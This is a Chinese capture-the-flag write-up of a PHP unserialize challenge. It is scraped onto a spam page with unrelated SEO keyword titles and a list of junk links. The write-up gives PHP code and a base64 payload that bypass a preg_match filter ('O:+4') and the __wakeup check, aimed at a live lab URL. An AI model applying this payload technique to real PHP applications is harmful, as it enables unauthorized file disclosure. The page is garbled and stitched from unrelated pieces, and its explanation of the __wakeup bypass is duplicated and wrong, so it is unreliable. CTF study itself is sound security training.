当前位置: 首页 > news >正文

个人做广播网站需要注意什么杭州网站优化平台

个人做广播网站需要注意什么,杭州网站优化平台,游戏设计网站,手机app官方安装下载1、题目描述 2、 3、分析代码 class Demo { private $file fl4g.php; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php。 $a serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化&a…

1、题目描述

2、

3、分析代码

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

4、根据代码中的提示,我们将fl4g.php进行base64编码后的值传给var,试着访问但是页面没有回显

5、根据题目我们需要进行序列化(代码引用这篇文章:攻防世界之Web_php_unserialize(超详细WP)_php unserialize-CSDN博客)

6、在源代码中我们需要绕过几个函数

<?php
class Demo { private $file = 'fl4g.php';
}
$a = serialize(new Demo);
$a = str_replace('O:4', 'O:+4',$a); //绕过preg_match()函数
$a = str_replace(':1:', ':2:',$a); //绕过__wakeup()函数
echo ($a);                  
?>

7、运行代码可以看到序列后的结果

O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}

将a的值进行编码

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ== 

8、

  1. class Demo { private $file = 'fl4g.php'; }:定义了一个名为Demo的类,该类有一个私有属性$file,默认值为fl4g.php

  2. $a = serialize(new Demo);:创建了一个Demo类的实例,并对其进行序列化,然后将序列化后的字符串赋值给变量$a

  3. $a = str_replace('O:4', 'O:+4',$a);:这行代码的目的是绕过preg_match('/[oc]:\d+:/i', $var)这样的正则表达式检查。原始的序列化字符串中,O:4表示的是一个对象,后面的数字4表示类名的长度。通过将4替换为+4,可以使正则表达式无法匹配,从而绕过检查。

  4. $a = str_replace(':1:', ':2:',$a);:这行代码的目的是绕过__wakeup()函数的检查。在__wakeup()函数中,如果$this->file的值不等于index.php,就会被重置为index.php。通过将序列化字符串中的:1:替换为:2:,可以使$this->file的值始终等于index.php,从而绕过检查。

  5. echo base64_encode($a);:最后,将修改后的序列化字符串进行Base64编码,然后输出。

 

9、访问url:61.147.171.105:65034/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

10、

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

http://www.ds6.com.cn/news/110736.html

相关文章:

  • 做粥哪个美食网站好宁波企业seo外包
  • 沈阳企业做网站明星百度指数排名
  • Wordpress 微博评论济南优化seo公司
  • 搭建平台载体东营网站seo
  • shopify建站教程优化设计四年级上册语文答案
  • 网站建设3lue宁波 seo排名公司
  • 常德红网官网网站网络市场营销
  • 哪些公司做网站开发产品市场推广方案
  • 网站流量如何增加中国广告公司前十强
  • 泰安市建设局网站关键对话
  • 目前做的比较好的法律网站有哪些福州百度seo代理
  • 慈溪网站建设报价网络营销推广方式
  • 做外贸网站如果是东西杂会不会不好推广广州抖音seo
  • 做策划常用的网站线上宣传推广方式
  • 查不到备案的网站外贸推广平台哪个好
  • 网站建设所需美工seo推广哪家公司好
  • 手机编程教学优化网站排名推广
  • 外贸工艺品网站建设产品关键词
  • 电子商务网站开发书营销型网站外包
  • 百度舆情系统技术优化seo
  • 已有网站怎么做后台狼雨seo网站
  • 多元国际二维码图片网站外链优化方法
  • 北京城乡建设学校网站百度最新版app下载安装
  • 网站允许flashseo实战培训费用
  • 南县做网站多少钱新闻热点事件2021(最新)
  • 广州网站建设50强名单黄页88推广多少钱一年
  • 淘宝客做连接网站吗免费职业技能培训网
  • 平台营销策略南宁百度关键词优化
  • 三水网站建设首选公司新乡百度关键词优化外包
  • 三明 网站建设店铺推广平台有哪些